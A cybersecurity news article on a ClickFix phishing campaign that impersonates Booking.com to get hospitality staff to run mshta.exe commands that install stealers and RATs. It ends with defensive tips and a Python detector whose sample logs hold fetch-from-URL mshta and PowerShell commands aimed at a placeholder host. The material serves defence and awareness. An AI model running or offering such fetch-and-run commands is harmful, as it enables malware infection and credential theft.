A newly uncovered phishing campaign is targeting employees in the hospitality sector by impersonating Booking.com, one of the world’s largest online travel agencies. At the heart of the campaign is a clever trick called ClickFix—a social engineering tactic that convinces users to execute malware on their own systems.
First detected in December 2024, the campaign has been traced to a threat actor Microsoft tracks as Storm-1865, and its impact has stretched across North America, Europe, Oceania, and Southeast Asia. The goal? Steal login credentials, plant malware, and commit financial fraud.
A Simple Email, a Fake Review, and a Deceptive Link
Booking.com as the Bait
The attack begins with an email that appears to come from Booking.com, claiming a customer has posted a negative review. The target is asked to respond or provide feedback.
Included in the message is either a link or a PDF file with a clickable link, which appears to take the recipient to the real Booking.com website. But clicking it leads elsewhere—a fake CAPTCHA page, carefully designed to mimic Booking.com’s branding in the background.
This tactic helps lower the victim’s guard, encouraging them to follow on-screen instructions.
ClickFix: The Technique Fooling Even Cautious Users
Turning Victims into Unknowing Attackers
The ClickFix method is at the core of this phishing attack. Once users reach the fake CAPTCHA screen, they’re prompted to press Windows + R, paste a command from the site, and press Enter.
That command quietly uses a built-in Windows utility—mshta.exe—to pull in the malware payload.
This user-driven technique works so well because it bypasses traditional security filters, which often rely on detecting malicious links or file attachments. In this case, the user unwittingly runs the code themselves, making the attack difficult to stop.
What Happens Next?
The malware installed varies but includes well-known threats like:
- XWorm – A remote access trojan (RAT)
- Lumma Stealer – Steals browser data, credentials, and more
- VenomRAT, AsyncRAT, Danabot, NetSupport RAT – Other tools for stealing data and gaining remote control
All of them give the attacker ongoing access to the victim’s machine and sensitive information.
Storm-1865: A Growing and Evolving Threat Actor
From E-commerce to Hospitality
Microsoft previously observed Storm-1865 targeting online shoppers with fake payment pages linked to platforms like Gmail and iCloud. Their tactics continue to evolve as they now use vendor-specific lures, such as Booking.com-themed emails, to reach industry-specific employees.
This campaign is part of a larger trend in which threat actors are refining their phishing lures to match the roles and behaviors of their targets.
Not Just Criminals: APTs Are Now Using ClickFix Too
Nation-State Actors Adopt the Same Technique
Cybersecurity experts have reported that even advanced persistent threat (APT) groups linked to countries like Russia and Iran are now using ClickFix in their campaigns.
One example is APT28 (associated with Russia), and another is MuddyWater (believed to be linked to Iran). Both have integrated ClickFix into recent social engineering attacks.
According to Group-IB, the success of this method lies in its ability to trick users into completing the infection process themselves—a clever way to dodge detection.
Variations on the ClickFix Theme
ClickFix Is Versatile—and It’s Spreading Fast
Security firms have observed several variations of ClickFix-based attacks, including:
- Fake CAPTCHA challenges that launch PowerShell scripts delivering Lumma and Vidar Stealers
- Google reCAPTCHA-themed lures deployed by the Blind Eagle group
- Booking confirmation links that redirect to malware download pages
- Windows-themed decoy pages that prompt similar command execution steps
Each variant uses a false problem and a misleading solution to push the user into action. And once they comply, the malware silently moves in.
GitHub Repositories as Malware Launchpads
AI-Generated Pages, Real-World Damage
In one ClickFix campaign analyzed by Trend Micro, attackers uploaded fake GitHub repositories using AI-generated descriptions and fake reviews. These pages offered:
- Game cheats
- Cracked tools
- Cryptocurrency utilities
Victims downloaded ZIP files thinking they were getting something helpful, but instead received a loader program—named SmartLoader—which deployed Lumma Stealer.
The abuse of trusted platforms like GitHub makes detection and prevention much harder, especially for individuals and small businesses.
G DATA Reports Regional Focus
Victims in Germany and the Philippines
According to German security firm G DATA, one variation of this campaign has heavily targeted users in Germany and the Philippines.
The company observed fake Booking.com messages embedded with ClickFix steps that led directly to the Lumma Stealer—a repeated choice among attackers due to its wide functionality and high success rate.
Other Recent Stealer Campaigns and Evolution
Beyond Lumma: The Rise of StrelaStealer and Custom Loaders
Alongside Lumma and XWorm, other stealers are appearing more often. Trustwave recently shared findings about StrelaStealer, delivered through fake invoice emails.
This malware uses layered obfuscation and custom crypters like Stellar Loader to hide from antivirus tools. It reflects a larger move toward highly customized delivery tools built to match specific payloads.
Why ClickFix Works So Well
It Uses Trust, Not Tech, to Bypass Security
ClickFix doesn’t rely on hidden exploits or zero-day flaws. Instead, it exploits human behavior:
- Users believe they’re solving a problem
- They follow the instructions willingly
- The malware avoids detection because the user starts the process
It’s a new twist on social engineering that combines familiar-looking websites, a little technical jargon, and a sense of urgency to move quickly from click to infection.
How to Protect Against ClickFix Campaigns
Tips for Individuals and Organizations
- Never follow manual commands from unknown websites
- Watch for urgency or emotional manipulation in emails
- Train teams on emerging phishing methods, including ClickFix
- Block access to mshta.exe if not used internally
- Use email filtering to catch fake travel or invoice messages
- Apply behavioral monitoring tools to detect abnormal command use
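The "abnormal command use" a behavioral monitor should catch here is the one the ClickFix steps above produce: a script host such as mshta.exe started interactively (the Windows + R Run dialog launches children of explorer.exe) with a remote URL on its command line. The detection below is an added illustration, not code from Microsoft, Group-IB or any vendor named in this article; the record format, the `example.invalid` URLs and the sample events are constructed for the example.

```python
"""Flag ClickFix-style process creations: an interactively launched script
host (mshta.exe, PowerShell, cmd.exe) whose command line points at a URL."""
import re
from dataclasses import dataclass

# Script hosts typically abused by ClickFix lures; mshta.exe is the one in this campaign.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe"}
# A child of explorer.exe is what the Win+R Run dialog produces (assumption: Sysmon-style
# process-creation telemetry that records the parent image).
INTERACTIVE_PARENTS = {"explorer.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


@dataclass
class ProcessEvent:
    image: str          # full path of the created process
    command_line: str
    parent_image: str


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_clickfix_like(ev: ProcessEvent) -> bool:
    """True when a script host launched from explorer.exe pulls content from a URL."""
    if basename(ev.image) not in SCRIPT_HOSTS:
        return False
    if basename(ev.parent_image) not in INTERACTIVE_PARENTS:
        return False
    return URL_RE.search(ev.command_line) is not None


def parse_line(line: str) -> ProcessEvent:
    """Parse a constructed 'Image|ParentImage|CommandLine' record (not a real log format)."""
    image, parent, cmd = line.split("|", 2)
    return ProcessEvent(image=image, command_line=cmd, parent_image=parent)


# Constructed sample events; only the first and last match the pattern.
SAMPLE_LOG = [
    r"C:\Windows\System32\mshta.exe|C:\Windows\explorer.exe|mshta https://example.invalid/verify",
    r"C:\Windows\System32\mshta.exe|C:\Program Files\App\app.exe|mshta C:\ProgramData\App\ui.hta",
    r"C:\Windows\System32\notepad.exe|C:\Windows\explorer.exe|notepad https://example.invalid/a.txt",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\explorer.exe|powershell -Command Invoke-WebRequest https://example.invalid/check",
]


def scan(lines):
    """Return the events that look like a user pasting a ClickFix command."""
    events = [parse_line(line) for line in lines]
    return [ev for ev in events if is_clickfix_like(ev)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("ALERT:", basename(hit.image), "<-", basename(hit.parent_image), "|", hit.command_line)
```

Legitimate local .hta launches from an installed application (second sample) and ordinary programs opened from the desktop with a URL argument (third sample) do not fire, which keeps the rule narrow enough to act on.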
FAQs
What is the ClickFix technique in phishing?
ClickFix is a social engineering method where a fake webpage tells the user to run a command on their computer, usually resulting in malware installation.
How is Booking.com used in the phishing scam?
Attackers pretend to send negative reviews from Booking.com to hospitality workers. The email includes links or PDFs that direct users to fake sites prompting malware installation.
What types of malware are dropped in these attacks?
Common payloads include Lumma Stealer, XWorm, NetSupport RAT, VenomRAT, and Danabot.
Why does ClickFix evade security tools?
Because the victim willingly runs the command, traditional antivirus tools may not see it as suspicious.
Who is Storm-1865?
A threat actor tracked by Microsoft responsible for phishing and financial fraud across various industries, now using ClickFix tactics.
Are APT groups using ClickFix?
Yes. Nation-state actors from countries like Russia and Iran have adopted ClickFix to deliver malware like KoSpy and SMOKESABER.